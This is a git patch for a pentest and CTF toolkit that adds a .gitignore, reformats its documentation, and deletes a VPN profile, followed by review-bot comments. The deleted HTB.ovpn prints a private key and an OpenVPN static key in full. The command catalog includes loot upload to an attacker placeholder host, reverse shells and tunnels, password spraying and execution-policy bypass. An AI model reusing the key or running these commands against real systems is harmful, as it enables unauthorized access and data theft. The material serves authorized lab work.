From 322ba960af2abe0cd42837d79b7484038df2f676 Mon Sep 17 00:00:00 2001 From: 0xMarcio Date: Wed, 8 Oct 2025 16:05:08 +0200 Subject: [PATCH] chore(git): add .gitignore; purge accidentally tracked .ovpn and OS files - Add comprehensive .gitignore: OS cruft, caches, archives, VPN/secret files, captures\n- Remove previously tracked .DS_Store and HTB.ovpn --- .DS_Store | Bin 6148 -> 0 bytes .gitignore | 66 ++++++++++++++++++++++++++++++++++++++++ HOWTO.md | 44 +++++++++++++-------------- HTB.ovpn | 87 ----------------------------------------------------- README.md | 25 ++++++++++----- TOOLKIT.md | 46 ++++++++++++++-------------- 6 files changed, 128 insertions(+), 140 deletions(-) delete mode 100644 .DS_Store create mode 100644 .gitignore delete mode 100644 HTB.ovpn diff --git a/.DS_Store b/.DS_Store deleted file mode 100644 index 8e6053b5c1446d23c271414a9c7378619180f5dd..0000000000000000000000000000000000000000 GIT binary patch literal 0 HcmV?d00001 literal 6148 zcmeHKO-}+b5Pe0W1U+yv9yeaRE%6_02qu~sFQ{h)iI^-xU{}S{{s#ZBzG(~D4^zs*G^|T)3@1n7l7%c52rv2K!Yk+Z?ahn=mtp;U4 z8Te}q$h+IXJyIkXA@~0F<4K=$axiqL;inb$*7#48{$)B(W}G`g4-3q>+7M&3am(`{ z=IUdP=NxyLE1|Y=!|@O^YaP=v!+_Qidv6vK^oi@UUHNR4%IUw$dS`Y&Ddut#ZP-aO z@5|l4;|bGZj5+3-#oeFdnsFg__JS#%Oa6x?|2yE(vn*>~*;tXvPZ;2xEz;O`sI4-f3@8ID2IPDQsDhEl z%%MFx*vRoO^L0TH_T`g7Fz^_8%p7utVq7TEg&O~hVO%)vf%l6%W)59AjLpn-d}ibS zP>jt^dtlvRB8S>41Ij>=fgLw&$^C!!{r`V4NJq+mGVre$F!gS)+u@e{-CEh4+_eGq rjw&L4nL``G#$U&_BUkYe)e7eV=@282nL}DA`XOLx&_)^fRR+EQnklcj diff --git a/.gitignore b/.gitignore new file mode 100644 index 0000000..9cbe92d --- /dev/null +++ b/.gitignore 
@@ -0,0 +1,66 @@ +# OS +.DS_Store +Thumbs.db + +# Editors/IDE +.vscode/ +.idea/ + +# Python +__pycache__/ +*.py[cod] +*.pyo +*.egg-info/ +.venv/ +venv/ +.env +.env.* +.python-version + +# Node/JS +node_modules/ + +# Logs & caches +*.log +logs/ +tmp/ +*.tmp +.pytest_cache/ +.mypy_cache/ +.ruff_cache/ +.tox/ +.cache/ + +# Coverage/build +.coverage* +coverage/ +htmlcov/ +dist/ +build/ + +# Archives & captures +*.zip +*.tar +*.tar.gz +*.tgz +*.7z +*.gz +*.rar +*.pcap +*.pcapng + +# VPN/Secrets & credentials +*.ovpn +*.key +*.pem +*.crt +*.kdbx +*.rdp +*.pfx + +# Project-specific ignores +# Do not commit bulky artifacts accidentally +targets/*/www/* +# Keep scan results, but ignore raw packet captures +targets/*/scans/*.pcap* + diff --git a/HOWTO.md b/HOWTO.md index d7f5f65..48b97c3 100644 --- a/HOWTO.md +++ b/HOWTO.md @@ -1,6 +1,6 @@ -PentestPilot — HOWTO +# PentestPilot — HOWTO -Table of Contents +## Table of Contents - Overview — #overview - Install & Setup — #install--setup - Core Env Vars — #core-env-vars @@ -22,13 +22,13 @@ Table of Contents - Customization — #customization - Appendix — Common Command Recipes — #appendix--common-command-recipes -Overview +## Overview - This toolkit streamlines OSCP/HTB workflows: discovery, web recon, AD, credential hygiene, shells, tunnels, transfers, privilege escalation, post‑exploitation, reporting, and AI‑assisted orchestration. - Everything is CLI‑first, idempotent when possible, and resume‑aware via a per‑target manifest. - See: README.md:1 for the quick summary and TOOLKIT.md:1 for the command catalog. - Tips and conventions below assume a Linux attacker VM (Kali/Parrot/Ubuntu). Adjust paths for your OS. -Install & Setup +## Install & Setup 1) Place the repo in your working directory (e.g., `~/hax/htb`). 2) Load the shell profile so aliases and PATH work: echo "source $(pwd)/.zshrc.htb" >> ~/.zshrc 
@@ -56,13 +56,13 @@ Notes: - If a wrapper says a tool is missing, either install or skip that specific step. - Use `pipx` (or venv) for Python‑based tools to avoid site‑packages collisions. -Core Env Vars +## Core Env Vars - `HTB_ROOT` (default: current repo path) — base for targets and scripts. - `TARGET` — a current target convenience var set by `settarget`. - `OUTDIR` — output directory for scans in the current target (set by `settarget`). - Proxies: `HTTP_PROXY`/`HTTPS_PROXY` can be toggled via `proxy_toggle.sh on|off`. -Target Workflow +## Target Workflow 1) Create a target workspace: settarget 10.10.10.10 This creates `targets//{scans,loot,www,exploits}` and sets `OUTDIR`. @@ -89,7 +89,7 @@ Quick Aliases - Dashboard: `dashboard` (status), `resumeall`, `techactions` - QoL: `proxyon`, `proxyoff`, `cleanupscans`, `tmux_init.sh` -Automation & Orchestration +## Automation & Orchestration - Minimal recon: `auto_recon.sh ` - Web recon (current TARGET): `web_recon.sh ` → headers/tech/backup/dirb (+screenshots if `gowitness`) - Wide recon (list of hosts): `wide_web_recon.sh ` → httpx + nuclei + screenshots @@ -111,7 +111,7 @@ Advanced: Pipeline Semantics - Each phase records elapsed seconds and evidence file paths in manifest meta. - If a run fails midway, you can re‑invoke with `--resume` to continue where you left off. -Dashboard (Status & Evidence) +## Dashboard (Status & Evidence) - Command: `dashboard` Options: `--no-color`, `--compact`, `--json` - Columns: - target, created, last (timestamp of last pipeline), urls (count) @@ -123,7 +123,7 @@ Dashboard (Status & Evidence) - httpx JSON: `OUTDIR/httpx_.json` and `httpx_.summary.json` - nuclei JSON: `OUTDIR/httpx2nuclei_/nuclei.json` and `summary.json` -Manifest (State & Resume) +## Manifest (State & Resume) - Path: `targets//manifest.json` - Schema (high‑level): { 
@@ -150,7 +150,7 @@ Manifest (State & Resume) - `taskstatus ` — prints status; exit 0 if ok, 2 if running, 1 otherwise - `taskreset ` — remove/reset a task entry -AI Integrations +## AI Integrations - Providers: OpenAI (OPENAI_API_KEY) or local Ollama (defaults chosen automatically). - Robust helpers: `bin/ai/_ai_utils.py:1` (retries, timeouts, prompt truncation) - Tools: @@ -164,7 +164,7 @@ Troubleshooting AI: - If no OPENAI_API_KEY is set, the system falls back to Ollama (ensure it’s running). - You can reduce output size by setting smaller prompts and using `--compact` when calling dashboard. -Web Recon & Routing +## Web Recon & Routing - Pipeline: `httpx_to_nuclei.sh` → httpx alive list → nuclei with auto severity (based on URL count) → produces `.txt`, `.json`, `summary.json`. - Tech routing: `httpx_tech_route.py` flags: - `--tech` filter; `--severity` list; `--wpscan [--wpscan-limit N]`; `--extra [--extra-limit N]`; `--dry-run` 
@@ -174,43 +174,43 @@ Web Recon & Routing - `httpx_presets.sh`: concurrency profiles; `httpx_probe.sh` for fast probes - `gobuster_dir.sh`, `gobuster_vhost.sh`; `dirbuster.sh` (ffuf); backup hunters, CORS/methods/TLS, LFI tester -Active Directory & SMB +## Active Directory & SMB - Impacket wrappers: `getnpusers_wrapper.sh`, `getspns_wrapper.sh` - `kerbrute_wrapper.sh` (user enum), `cme_quick.sh` (shares/sessions/loggedon), `rpc_quick.sh` - SMB `smbmap_quick.sh` and `smb_check_write.sh` -Passwords & Wordlists +## Passwords & Wordlists - `mutate_words.py`, `merge_dedupe.sh`, `wordlist_cleanup.sh` — build/clean wordlists - `spray_http_basic.sh` — cautious HTTP Basic Auth spray (respect lockout policies) -Shells, Transfers, Privesc +## Shells, Transfers, Privesc - Shells: reverse one‑liners (`revsh.py`), listener (`listener.sh`), TTY upgrade tips - Transfers: `http_serve.sh` or `serve.py` (with web upload), `smb_server.sh`, `dl_oneshots.sh`, `push_http.sh` - Linux privesc: `linux_quick_enum.sh`, `suid_scan.sh`, `caps_scan.sh` - Windows privesc: `privesc_quick.ps1`, `find_unquoted_services.ps1`, `find_path_writable.ps1`, `win_share_enum.ps1` -Tunnels & Port Forwards +## Tunnels & Port Forwards - `chisel_server.sh` / `chisel_client.sh` — reverse tunnels - `autossh_socks.sh` — resilient SOCKS proxy - `socat_forward.sh` and `port_forward.sh` — local/remote forwards -QoL Utilities +## QoL Utilities - `cleanup_scans.sh` — prune old scan files - `proxy_toggle.sh` — set/unset HTTP(S) proxy env vars - `tmux_init.sh` — quick tmux workspace - `extract_urls.py` — harvest URLs from files (logs/notes) -Post‑Exploitation & Reporting +## Post‑Exploitation & Reporting - `linux_loot.sh` — safe, size‑capped artifacts collector (config via env: `MAX_SIZE`, `INCLUDE_*`) - `windows_loot.ps1` — conservative Windows loot collector (zip fallback) - `pack_report.sh` — compiles a markdown with summaries and file listings -Safety Notes +## Safety Notes - Use only with explicit authorization. 
- Many steps are safe by default (no brute force). Be mindful of account lockout policies when using auth‑related tooling. - For “unsafe” or exploit‑heavy checks, consider separate gated wrappers and explicit flags. -End‑to‑End Example +## End‑to‑End Example 1) Set up target and notes: settarget target.htb notesinit @@ -225,18 +225,18 @@ End‑to‑End Example 6) Resume across multiple targets later: resumeall -Troubleshooting +## Troubleshooting - Tool missing: wrappers fail gracefully and log hints. Install optional tools (httpx, nuclei, gobuster, gowitness, wpscan, droopescan, joomscan, magescan, impacket). - Manifest stuck in running: `manifest.py taskreset `. - No colors in dashboard: add `--no-color` or your terminal might not support ANSI. -Customization +## Customization - Adjust tags/severity in `httpx_to_nuclei.sh:1` and `httpx_tech_route.py:1`. - Extend tech presets and quick wrappers in `bin/web/`. - Tweak agent behaviors in `bin/ai/agent_orchestrator.py:1`. - Add your own manifest keys via `manifest.py set key value` for custom dashboards. -Appendix — Common Command Recipes +## Appendix — Common Command Recipes - Directory brute (gobuster): gobuster_dir.sh http://$TARGET/ /usr/share/wordlists/dirb/common.txt php,txt 50 - Vhost brute: gobuster_vhost.sh http://$TARGET/ subdomains-top1million-5000.txt 100 - Probe techs: httpx_probe.sh hosts.txt > live.txt diff --git a/HTB.ovpn b/HTB.ovpn deleted file mode 100644 index c68f7cb..0000000 --- a/HTB.ovpn +++ /dev/null 
@@ -1,87 +0,0 @@ -client -dev tun -proto tcp -remote edge-eu-free-2.hackthebox.eu 443 -resolv-retry infinite -nobind -persist-key -persist-tun -remote-cert-tls server -comp-lzo -verb 3 -data-ciphers-fallback AES-128-CBC -data-ciphers AES-256-CBC:AES-256-CFB:AES-256-CFB1:AES-256-CFB8:AES-256-OFB:AES-256-GCM -tls-cipher "DEFAULT:@SECLEVEL=0" -auth SHA256 -key-direction 1 - ------BEGIN CERTIFICATE----- -MIICDjCCAcCgAwIBAgIQAY7iX+I6dfaVWaMJXidIRTAFBgMrZXAwZDELMAkGA1UE -BhMCR1IxFTATBgNVBAoTDEhhY2sgVGhlIEJveDEQMA4GA1UECxMHU3lzdGVtczEs -MCoGA1UEAxMjSFRCIFZQTjogUm9vdCBDZXJ0aWZpY2F0ZSBBdXRob3JpdHkwHhcN -MjQwNDE1MTUyODM4WhcNMzQwNDE1MTUyODM4WjBeMQswCQYDVQQGEwJHUjEVMBMG -A1UEChMMSGFjayBUaGUgQm94MRAwDgYDVQQLEwdTeXN0ZW1zMSYwJAYDVQQDEx1I -VEIgVlBOOiBldS1mcmVlLTIgSXNzdWluZyBDQTAqMAUGAytlcAMhANRtLwPdgQ/j -oGEo7GTBqm6rNN83vgRsVqMf9cP83KlMo4GNMIGKMA4GA1UdDwEB/wQEAwIBhjAn -BgNVHSUEIDAeBggrBgEFBQcDAgYIKwYBBQUHAwEGCCsGAQUFBwMJMA8GA1UdEwEB -/wQFMAMBAf8wHQYDVR0OBBYEFD2YUNtsvUD2ynIAtfr1Uk1NjYz8MB8GA1UdIwQY -MBaAFNQHZnqD3OEfYZ6HWsjFzb9UPuDRMAUGAytlcANBAKYH1gYc72heLF8mu2vo -8FAcozEtFv+2g1OFvahcSoPrn7kbUcq8ebGb+o6wbgrVm8P/Y/c3h5bmnw5y8V3t -9gw= ------END CERTIFICATE----- ------BEGIN CERTIFICATE----- -MIIB8zCCAaWgAwIBAgIQAY7Mx8YFd9iyZFCrz3LiKDAFBgMrZXAwZDELMAkGA1UE -BhMCR1IxFTATBgNVBAoTDEhhY2sgVGhlIEJveDEQMA4GA1UECxMHU3lzdGVtczEs -MCoGA1UEAxMjSFRCIFZQTjogUm9vdCBDZXJ0aWZpY2F0ZSBBdXRob3JpdHkwIBcN -MjQwNDExMTA1MDI4WhgPMjA1NDA0MTExMDUwMjhaMGQxCzAJBgNVBAYTAkdSMRUw -EwYDVQQKEwxIYWNrIFRoZSBCb3gxEDAOBgNVBAsTB1N5c3RlbXMxLDAqBgNVBAMT -I0hUQiBWUE46IFJvb3QgQ2VydGlmaWNhdGUgQXV0aG9yaXR5MCowBQYDK2VwAyEA -FLTHpDxXnmG/Xr8aBevajroVu8dkckNnHeadSRza9CCjazBpMA4GA1UdDwEB/wQE -AwIBhjAnBgNVHSUEIDAeBggrBgEFBQcDAgYIKwYBBQUHAwEGCCsGAQUFBwMJMA8G -A1UdEwEB/wQFMAMBAf8wHQYDVR0OBBYEFNQHZnqD3OEfYZ6HWsjFzb9UPuDRMAUG -AytlcANBABl68VB0oo0rSGZWt6L+LNMnyHEJl+CQ+FTjQfzE6oqEMAvJTzdjMyeG -OOUNlQYwGRVajOauFa/IMvDsTBXOgw8= ------END CERTIFICATE----- - - ------BEGIN CERTIFICATE----- 
-MIIBxjCCAXigAwIBAgIQAZQTnGxLc3eYzWO9SnM9sjAFBgMrZXAwXjELMAkGA1UE -BhMCR1IxFTATBgNVBAoTDEhhY2sgVGhlIEJveDEQMA4GA1UECxMHU3lzdGVtczEm -MCQGA1UEAxMdSFRCIFZQTjogZXUtZnJlZS0yIElzc3VpbmcgQ0EwHhcNMjQxMjI5 -MTgxMDA2WhcNMzQxMjI5MTgxMDA2WjBKMQswCQYDVQQGEwJHUjEVMBMGA1UEChMM -SGFjayBUaGUgQm94MRAwDgYDVQQLEwdTeXN0ZW1zMRIwEAYDVQQDEwltcC0yNzQ1 -NjQwKjAFBgMrZXADIQDiwraGYtEpx63P6AMDQgczmsx4WO9iVPGTkVRRkyHrmqNg -MF4wDgYDVR0PAQH/BAQDAgeAMB0GA1UdJQQWMBQGCCsGAQUFBwMCBggrBgEFBQcD -ATAMBgNVHRMBAf8EAjAAMB8GA1UdIwQYMBaAFD2YUNtsvUD2ynIAtfr1Uk1NjYz8 -MAUGAytlcANBANAkGgddoR9WIbfv3C8gIPx6ivEyq1Tlo354JG/y+lv015bOjrmy -aL7cF4ILRaPTbxWeBfVeVQOwLrz4rCBwsg0= ------END CERTIFICATE----- - - ------BEGIN PRIVATE KEY----- -MC4CAQAwBQYDK2VwBCIEIAA2VTVH7CjQQECTQGg/FAy+5uJ6fGSRN5vAbeK3qawi ------END PRIVATE KEY----- - - -# -# 2048 bit OpenVPN static key -# ------BEGIN OpenVPN Static key V1----- -85341e27fb3510f97f3455db449ea6c4 -bf6b87e90802ced4c36feaa162ddd218 -9df22b9895d5770fd942b745b8d5532b -716fa58ac45e0f59b589ae1bc7ad11c7 -633c0c811b2ff682a35da172f6b32452 -410c971b8d422502aa012a37422d63bc -8ce669f3f1ded38144e3df1d0b689ae3 -5fa92a5f23600fba10da3ce71163e128 -bbac0bc5a922c16f3803f9dc36be960a -6cb371df43583fef525aa529ef2615b9 -95d7acd479cf90eada71684bec3c70e3 -2f2d25a66732544c5bc5f225d01940b7 -b66cf57327a3331ec7550e915bdc68a9 -4949a88a101f2d3383268fd32ffece1d -7d8d62d679707ae0c4d36a582b4a2a8f -24ee9da8eefa18339cd8d6425dceef89 ------END OpenVPN Static key V1----- - \ No newline at end of file diff --git a/README.md b/README.md index 6152c58..da6c1c5 100644 --- a/README.md +++ b/README.md 
@@ -1,11 +1,20 @@ -PentestPilot +# PentestPilot -- Overview -- Script‑driven toolkit to accelerate common OSCP/HTB workflows: discovery, web recon, AD, password hygiene, shells, tunnels, transfers, privilege escalation, post‑exploitation, reporting. -- AI agents and orchestrators automate reconnaissance and organize results. Works with OpenAI (OPENAI_API_KEY) or local Ollama. -- New? Start with HOWTO.md:1 for step‑by‑step usage, dashboard details, and resumeable pipelines. +AI‑assisted pentest recon and orchestration toolkit with resumeable pipelines, a rich terminal dashboard, and tech‑aware routing. -Quick Start (Dashboard in ~3–5 minutes) +[![Made for Pentesters](https://img.shields.io/badge/made_for-pentesters-111827?style=for-the-badge)](#) +[![AI‑Ready](https://img.shields.io/badge/AI-Ready-10B981?style=for-the-badge)](#) +[![Resumeable Pipelines](https://img.shields.io/badge/Pipelines-Resumeable-2563EB?style=for-the-badge)](#) +[![Dashboard](https://img.shields.io/badge/Dashboard-Color%20%7C%20JSON-7C3AED?style=for-the-badge)](#) + +## Overview +Script‑driven toolkit to accelerate common OSCP/HTB workflows: discovery, web recon, AD, password hygiene, shells, tunnels, transfers, privilege escalation, post‑exploitation, reporting. + +AI agents and orchestrators automate reconnaissance and organize results. Works with OpenAI (OPENAI_API_KEY) or local Ollama. + +New? Start with HOWTO.md:1 for step‑by‑step usage, dashboard details, and resumeable pipelines. + +## Quick Start (Dashboard in ~3–5 minutes) - Clone/open the repo and load the shell profile: echo "source $(pwd)/.zshrc.htb" >> ~/.zshrc && exec zsh - Minimal deps (Debian/Ubuntu): 
@@ -56,11 +65,11 @@ Features at a Glance Dependencies - Recommended: nmap, ffuf, httpx, nuclei, gobuster, gowitness, subfinder|amass, sqlmap, wpscan, droopescan, joomscan, magescan, impacket, ldap-utils, snmp, ripgrep, jq, python3 requests, socat, chisel -Documentation +## Documentation - HOWTO.md:1 — in‑depth “how to” with recommended tools, pipeline semantics, dashboard legend, manifest schema, and examples. - TOOLKIT.md:1 — command catalog grouped by category with references back to HOWTO. -Docs Index (quick links) +### Docs Index (quick links) - HOWTO: Overview — HOWTO.md#overview - Install & Setup — HOWTO.md#install--setup - Core Env Vars — HOWTO.md#core-env-vars diff --git a/TOOLKIT.md b/TOOLKIT.md index 27cc5bc..79a269e 100644 --- a/TOOLKIT.md +++ b/TOOLKIT.md @@ -1,8 +1,8 @@ -PentestPilot — Quick Reference +# PentestPilot — Quick Reference For step‑by‑step usage, pipeline semantics, dashboard features, and resume behavior, read HOWTO.md:1. This file focuses on a clickable, categorized command index with succinct usage. Most entries accept TARGET via env if a positional argument is omitted. -Table of Contents +## Table of Contents - Setup — #setup - Core Workflow — #core-workflow - Enumeration — #enumeration-requires-target @@ -25,13 +25,13 @@ Table of Contents - Hashes — #hashes-binhashes - Tips — #tips -Setup +## Setup - Keep this repo in a working folder, e.g., htb/. - Source the shell helpers from your main zshrc: echo "source $(pwd)/.zshrc.htb" >> ~/.zshrc - Open a new shell or run: source .zshrc.htb -Core Workflow +## Core Workflow - settarget - Creates targets/ with scans, loot, www, exploits. - Sets OUTDIR to the target’s scans directory. @@ -41,7 +41,7 @@ Core Workflow - notesinit → scaffold notes.md in target directory - notesattach → append scan artifacts summary to notes -Enumeration (requires TARGET) +## Enumeration (requires TARGET) - nq → Quick nmap: scripts + versions - nf → Full TCP: -p- then service/version - nu → UDP top 200 
@@ -58,7 +58,7 @@ Individual scripts (bin/) - ftp_enum.sh - snmp_enum.sh [community] -Automation (bin/automation/) — see HOWTO: Automation & Orchestration, Dashboard, Manifest +## Automation (bin/automation/) — see HOWTO: Automation & Orchestration, Dashboard, Manifest - auto_recon.sh [--no-udp] - parse_nmap_open_ports.sh <*.gnmap> - report_summary.py <*.gnmap ...> @@ -96,7 +96,7 @@ dashboard --compact resumeall ``` -Web helpers (bin/web/) — see HOWTO: Web Recon & Routing +## Web helpers (bin/web/) — see HOWTO: Web Recon & Routing - dirbuster.sh [wordlist] [exts] — ffuf directory fuzz - vhost_ffuf.sh [wordlist] — virtual hosts - param_fuzz.sh [wordlist] — parameter discovery @@ -144,7 +144,7 @@ gobuster_vhost.sh http://$TARGET/ /usr/share/wordlists/seclists/Discovery/DNS/su gobuster_dir.sh http://$TARGET/ /usr/share/wordlists/dirb/common.txt php,txt 50 ``` -Reverse shells (bin/shells/) +## Reverse shells (bin/shells/) - revsh.py — prints common one-liners - listener.sh — rlwrap + nc/ncat listener - tty_upgrade.sh — quick TTY tips @@ -161,7 +161,7 @@ revsh.py YOUR_IP 4444 tty_upgrade.sh ``` -File transfer (bin/transfer/) +## File transfer (bin/transfer/) - http_serve.sh [port] — simple Python HTTP server - serve.py [port] — HTTP server with web upload (POST /upload) - push_http.sh — upload to serve.py @@ -181,7 +181,7 @@ push_http.sh loot.txt http://YOUR_IP:8000/upload smb_server.sh share ./loot ``` -Crypto / Text (bin/crypto/) +## Crypto / Text (bin/crypto/) - encoders.py b64e|b64d|urle|urld|hex|unhex|xor|rot - jwt_show.py — decode header/payload (no verify) @@ -191,7 +191,7 @@ encoders.py b64e 'secret'; encoders.py urle 'a b' jwt_show.py eyJhbGciOi... ``` -Privilege Escalation (bin/privesc/) +## Privilege Escalation (bin/privesc/) - linux_quick_enum.sh — basic local recon - suid_scan.sh — list SUID/SGID - caps_scan.sh — list file capabilities 
@@ -202,7 +202,7 @@ linux_quick_enum.sh caps_scan.sh ``` -Misc (bin/misc/) +## Misc (bin/misc/) - cyclic.py create | offset — pattern + offset - port_forward.sh — wrappers for ssh -L/-R/-D - extract_urls.py @@ -214,7 +214,7 @@ port_forward.sh -L 8080:127.0.0.1:80 user@host extract_urls.py notes.md ``` -AI (bin/ai/) — see HOWTO: AI Integrations +## AI (bin/ai/) — see HOWTO: AI Integrations - ask.py [-m model] [-s system] "prompt" | - (stdin) - wordlist_from_context.py [context-file|-] - orchestrate_web.py @@ -237,7 +237,7 @@ orchestrate_web.py hosts.txt agent web hosts.txt ``` -Active Directory (bin/ad/) +## Active Directory (bin/ad/) - getnpusers_wrapper.sh [userlist.txt] - getspns_wrapper.sh - ldap_quick_users.sh [user pass] @@ -254,7 +254,7 @@ kerbrute_wrapper.sh domain users.txt 10.10.10.5 cme_quick.sh $TARGET user pass ``` -Passwords (bin/passwords/) +## Passwords (bin/passwords/) - mutate_words.py word1 [word2 ...] | - - spray_http_basic.sh - merge_dedupe.sh [file2 ...] — dedup merged lists @@ -269,7 +269,7 @@ wordlist_cleanup.sh merged.txt 8 64 > cleaned.txt spray_http_basic.sh http://$TARGET/protected users.txt Winter2025! ``` -Windows (bin/windows/) +## Windows (bin/windows/) - privesc_quick.ps1 — run on target - win_share_enum.ps1 -Target - find_unquoted_services.ps1 — potential service path issues @@ -283,7 +283,7 @@ powershell -ep bypass -f bin/windows/win_share_enum.ps1 -Target $TARGET powershell -ep bypass -f bin/windows/find_unquoted_services.ps1 ``` -Post-Exploitation (bin/post/) +## Post-Exploitation (bin/post/) - linux_loot.sh — targeted loot collector with size caps - windows_loot.ps1 — targeted loot collector (PowerShell) - pack_report.sh — merge loot/scans into markdown report @@ -294,7 +294,7 @@ LOOT_DIR=/tmp/loot MAX_SIZE=10485760 INCLUDE_DB=1 bin/post/linux_loot.sh bin/post/pack_report.sh $TARGET ``` -DNS (bin/dns/) +## DNS (bin/dns/) - zone_transfer.sh [ns] - subenum.sh - gobuster_dns.sh [wordlist] [threads] 
@@ -305,7 +305,7 @@ zone_transfer.sh target.htb gobuster_dns.sh target.htb /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-5000.txt 100 ``` -Scanning (bin/scan/) +## Scanning (bin/scan/) - naabu_quick.sh [flags] - masscan_top.sh [rate] @@ -315,7 +315,7 @@ naabu_quick.sh $TARGET -p 1-65535 masscan_top.sh $TARGET 20000 ``` -Tunnels (bin/tunnel/) +## Tunnels (bin/tunnel/) - chisel_server.sh - chisel_client.sh R::: - autossh_socks.sh [lport] @@ -328,7 +328,7 @@ chisel_server.sh 8000 & chisel_client.sh YOUR_IP:8000 R:8080:127.0.0.1:80 ``` -Pwn (bin/pwn/) +## Pwn (bin/pwn/) - pwntools_template.py — starter exploit template Examples @@ -336,7 +336,7 @@ Examples python3 bin/pwn/pwntools_template.py REMOTE=1 HOST=$TARGET PORT=31337 ``` -Hashes (bin/hashes/) +## Hashes (bin/hashes/) - extract_ntlm_from_secretsdump.py [out] - john_pfx.sh — john format for PFX @@ -346,7 +346,7 @@ extract_ntlm_from_secretsdump.py secretsdump.out ntlm.txt john_pfx.sh cert.pfx > pfx.hash ``` -Tips +## Tips - OUTDIR controls where scans are saved; set by settarget. - Most scripts accept TARGET via env if argument omitted. - If a tool isn’t installed (ffuf, getcap, ldapsearch, snmpwalk), install it or adjust the command.
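Review bot: the `.gitignore` hunk excludes `targets/*/www/*` but not `targets/*/loot/`, even though the HOWTO hunk shows each target workspace gets `scans,loot,www,exploits` directories and `linux_loot.sh` / `windows_loot.ps1` write collected artifacts into loot; that is exactly where harvested credentials and target data land, so add `targets/*/loot/` (and consider `targets/*/exploits/`) next to the existing project-specific rule. Two patterns are redundant: `targets/*/scans/*.pcap*` is already covered by the global `*.pcap` and `*.pcapng`, and `*.gz` already matches `*.tar.gz`. Also check that `*.log` and `logs/` do not swallow scan output the HOWTO hunk says is recorded as evidence file paths in the manifest; if any evidence is written as `.log`, scope those two rules to tool caches instead.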
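Review bot: deleting `HTB.ovpn` in this commit does not remove it from history; the `-----BEGIN PRIVATE KEY-----` block, the `OpenVPN Static key V1` block and the client certificate in the removed hunk remain recoverable from every earlier commit (`git log --all --full-history -- HTB.ovpn`), so the subject line's "purge" overstates what the change does. Treat the key material as compromised: regenerate the VPN profile from the provider, then rewrite history (for example `git filter-repo --path HTB.ovpn --invert-paths`) and force-push, and have anyone with a clone re-clone. The new `*.ovpn` ignore rule only prevents future accidental adds; a pre-commit secret scanner that matches the `BEGIN PRIVATE KEY` marker would have stopped this file before the first push.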
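Review bot: in the HOWTO.md hunks the section titles are promoted to `#` and `##`, but the Table of Contents entries stay plain text (`- Overview — #overview`), so the anchors are never rendered as links even though the new headings now make them resolvable; rewrite each entry as `- [Overview](#overview)`. The slugs already listed (`#install--setup`, `#appendix--common-command-recipes`) do match GitHub's rendering of `## Install & Setup` and `## Appendix — Common Command Recipes`, since the ampersand and the dash both collapse to a double hyphen, so only the link syntax is missing. The `README.md:1` and `TOOLKIT.md:1` references are editor-style line references rather than links; `[README.md](README.md)` would render.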
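Review bot: in the first README.md hunk all four badges link to `#`, which is a dead anchor on the rendered page; either point each at the section it describes or drop the link wrapper. In the second README.md hunk ` Dependencies` stays an unchanged plain context line while the adjacent `Documentation` becomes `## Documentation` and `Docs Index (quick links)` becomes `###`, so heading levels are now inconsistent within one file; convert `Dependencies` (and `Features at a Glance`, the hunk's context title) in the same change so the whole file uses Markdown headings.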
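Review bot: the TOOLKIT.md hunks convert every section title to `##` but leave the `Examples` sub-headers as plain lines (visible as context in the Pwn hunk: `- pwntools_template.py — starter exploit template` followed by `Examples`), so each rendered section is a heading, a bullet list, then an unstyled word before the fenced block; use `### Examples` throughout. The intro sentence also promises "a clickable, categorized command index", yet the Table of Contents entries (`- Setup — #setup`) are not links; apply the same `- [Setup](#setup)` rewrite as suggested for HOWTO.md.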